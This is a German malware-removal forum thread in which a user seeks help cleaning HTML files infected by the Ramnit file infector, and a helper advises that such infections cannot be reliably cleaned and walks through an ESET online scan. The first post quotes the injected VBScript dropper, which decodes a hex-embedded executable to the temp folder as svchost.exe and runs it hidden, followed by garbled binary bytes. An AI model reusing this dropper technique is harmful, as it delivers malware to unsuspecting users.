Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Malware Script aus HTML Datein entfernen (https://www.trojaner-board.de/166464-malware-script-html-datein-entfernen.html)

Ramesh 27.04.2015 01:32
Malware Script aus HTML Datein entfernen
 
Hallo,

ich hatte mir vor einige Zeit einen Schädling eingefangen, der u.a. .dll/ .exe und .html/ .htm Dateien beschädigt hat. Den Übeltäter selber konnte ich wieder los werden, das System ist momentan "sauber", bin mit diversen Progs drüber.

Nur die veränderten .html und .htm Dateien bekomme ich nicht sauber, ohne jetzt manuell an zich Hunderte Dateien ran zu müssen, habe auch keine weiteren Sicherungen und die Dateien sind mir sehr wichtig. Habe es auch schon hiermit versucht, leider ohne Erfolg: hxxp://polygoncell.blogspot.de/2010/08/i-got-infection-of-virus-on-my-pc-last_7746.html

Das o.g. Programm greift nicht auf Unterordner zu und fixt auch nicht gefundene Dateien, zumindest bei mir unter Win Vista nicht.

Dieser Script selber fügt sich in besagte Dateien in den letzten Absatz mit ein, sieht dann in etwa so aus:

HTML-Code:
</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D000000000000000000000000000000000000000000000000504500004C010600000000000000000000000000E0000F0

Dieser Zahlenreihenfolge geht dann ellenlang weiter (ist jetzt nur ein Ausschnitt) dann hört es nach den ganzen Zahlen auf mit:

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D28EB95B3907F22C0DB13C94688D6548BE9B82A500A07017BB983BDB80711060B9D4E83011780E89E57DD485366277C80E6170F780F35120B425F77F302B55F7A8326446708C542EA0D0D48422BCCF85496C72DEF49B0B4DC9849175821FF02CFD8EC3B93CEB8D9FF9410ED8607270C01CF4D24B358279C0F78674CA45C69A7E82E7DC260BF647741C05C71603A75C6D8F06D552F35E11EE7538B0BAEBD0759A92789E7C326A4058F519876638910A5EA8F4FE3177084CE8370D62EAFD50606B2AB24E904ACFD5455C3AEC847EA59F3CD2B3CC9DEB4CF85937F559F3A938FE148E03AE79EDDCC11F802DD1CD142F759EE765931E8A7927E3C0DF2AD1B5ED184203672D701536910A97D8DCC9C1643C27E7432D7B17F669D14D36B08B39262ABBF94081C99A4203A76B1640D63A2A1510E063BF66F53AB040AEB9849DD3909C58F8ADDFA3FB912AF1388AD0A5FB912AA7FB912AA6FB912A2CD2D967C007D56489EC912AA5FB912A"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--�<� �
K������ ��4��̶�ERe~����_�<�خ�� Y=�V!�5]db�2�f�S��歹J�/sɂֈ��{�ЮW�J2S��ⶄ�����饞��i�X$J�
�\�;R��ϫt�
�~,���E-�V���PP�Fu\��$?%<y����=�BMa�!��\cõv�=�a�]C�q�&o:��8�*�e,��o;}�a��eW!J�絈���������GO���˾�c���L@�j7��6b^^������G��^Q��|e�=�z
zP���u�[�ݖS��35���_��o�=��4O� 8��WζA���Ne>���(H  �fR}��f�f�f��.NgS�PZ=f �f-->

Habt ihr eine Idee oder einen Tipp (anderes Programm o.ä.) wie ich meine gesammten Laufwerke nach html und htm Dateien mit diesem Script absuchen und automatisch entfernen lassen kann :confused:

schrauber 27.04.2015 09:25
Hi,

ich kenne da nichts, musst Du von Hand machen. Oder Du schreibst Dir selbst ein Script welches das macht (wenn das überhaupt möglich ist).

Ramesh 27.04.2015 17:54
Hey,

so, im ausgeschlafenen Zustand hat es dann doch noch geklappt :kaffee: ;)

Der oben genannte Script Remover funktioniert wunderbar, wenn man einiges beachtet. Ich hatte das Problem, dass das Prog angeblich nicht tief genug scannt, dabei war es nur ein Berechtigungsproblem, worauf man achten muss. Bei mir blieb der Scanner immer in den Programm Data oder Programm Files Ordnern stehen mit "access denied!". Der einfacherhalber sollte man den Scann mit dem richtigem Windows Administrator Konto durchführen, nicht mit einem Konto mit "nur" Admin-Rechten, bei letzterem müsste man die Besitzrechte der Ordner und Unterordner übernehmen, da diese dem TrustedInstaller zugeordnet sind, das hat aus Sicherheitsgründen schon seine Berechtigung und sollten im Anschluß wieder unbedingt rückgängig gemacht werden. Zudem ist diese Möglichkeit mit mehr Aufwand verbunden, drum besser das Windows Administrator Konto beim Scann nutzen.
Alle infizierten Dateien wurden gefunden und der VB Script wieder rausgeschlöscht, war doch mehr als ich erwartet habe, per Hand hätte man die Menge niemals bewältigen können, geschweige denn gefunden, zumal das manuelle öffnen auch schon ne Ewigkeit braucht, da das Script ellenlang ist, dann lieber das System sauber neu aufsetzen, wenn man auf die .html/ .htm Dateien verzichten kann.

Worauf noch unbedingt zu achten ist, bevor man sich an die html Dateien macht ist, dass man schon mit einem guten Scanner alle infizierten Dateien (.exe, .dll's) gefixt hat und die zusätzlich installierten Schädlingsanwendungen gründlich entfernt hat (im abgesicherten Modus), sonst wird der Script immer wieder neu in die Html-Dateien geschrieben und breitet sich auch auf andere Laufwerke aus, da es immer im Hintergrund mitläuft. Davor auch keine Programme/ Anwendungen/ Html-Dateien ausführen, da diese schon befallen sein können.

Der Übeltäter wird als Virus.Win32.Ramnit.a bzw. Worm.Win32.Ramnit.a bezeichnet ... falls mal jemand diesen auch mal entfernen muss und bei den Html-Dateien nicht weiter kommt :)

VLG

schrauber 28.04.2015 12:49
Ich will ja jetzt nicht den Miesepeter machen, aber ich bereinige seit 2008, und

Zitat:
Virus.Win32.Ramnit.a
ist nicht zu bereinigen. nicht sauber.

Ramesh 28.04.2015 17:33
Ist schon ok ;)

Darf ich fragen, woran du das fest machst, bleiben da noch irgendwelche toten Leichen über? Bzw. was könnte im schlimmsten Falle passieren, wenn ich denke, mein Rechner ist sauber? Ich kann zumindest keine verdächtigen Prozesse/ Anwendungen im Hintergrund fest machen.

Ich habe von meinem Rechner leider keine Win CD ausgeliefert bekommen, habe nur eine Wiederherstellungspartition auf einen anderen Laufwerk (werksseitig). Meinst du, da könnte sich dann auch etwas eingenistet haben, wenn ich das System neu aufsetzen sollte?

schrauber 29.04.2015 08:37
Nein, die Wiedherstellungspartition ist sicher. Aber im normalen System wird jede ausführbare Datei infiziert.

Du bereinigst die wirkliche malware, startest dann irgend eine Exe, schwupp geht das Spiel von vorne los.

Ramesh 29.04.2015 10:00
Hätte dann aber nicht mein Virensanner anschlagen sollen, zumal er einige .exe Dateien gleich in die Quarantäne geschoben hat. Im Nachhinein könnte dieser natürlich auch manipuliert sein, sodass ich es nicht merke, oder?

Ich müsste vorher aber unbedingt einiges sichern, was ist denn, wenn ich ein externes Laufwerk einbinde, könnte da was rüberschwappen?

schrauber 30.04.2015 06:59
Zitat:
Im Nachhinein könnte dieser natürlich auch manipuliert sein, sodass ich es nicht merke, oder?
Exakt ;)

Mach erstmal zur Kontrolle:


ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset


Ramesh 03.05.2015 23:23
Danke dir, der Scann hat zwar mehrere Stunden gedauert, aber es wurden weitere htm Dateien mit nem entsprechendem Inhalt gefunden (die fingen nicht mit dem JS Befehl an, waren irgendwelche chinesischen Zeichen), habe sie dann gelöscht (da entbehrbar). Sonst wurden halt nur noch die Dateien, die in der Qurantäne sind angezeigt, sonst nichts :dankeschoen:

Heißt das, ich bin clean? :D

schrauber 04.05.2015 13:25
Nö. :D

das heisst du darfst dich trauen, wenn du willst. Bei Fileinfector hört der Spass eben auf :)

Ramesh 04.05.2015 22:14
LoL ok :D

Danke dir auf jeden Fall für deine Unterstützung und den Rat, die nächste Formatierung kommt bestimmt :party:

schrauber 05.05.2015 08:51
Gern Geschehen :)


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:26 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131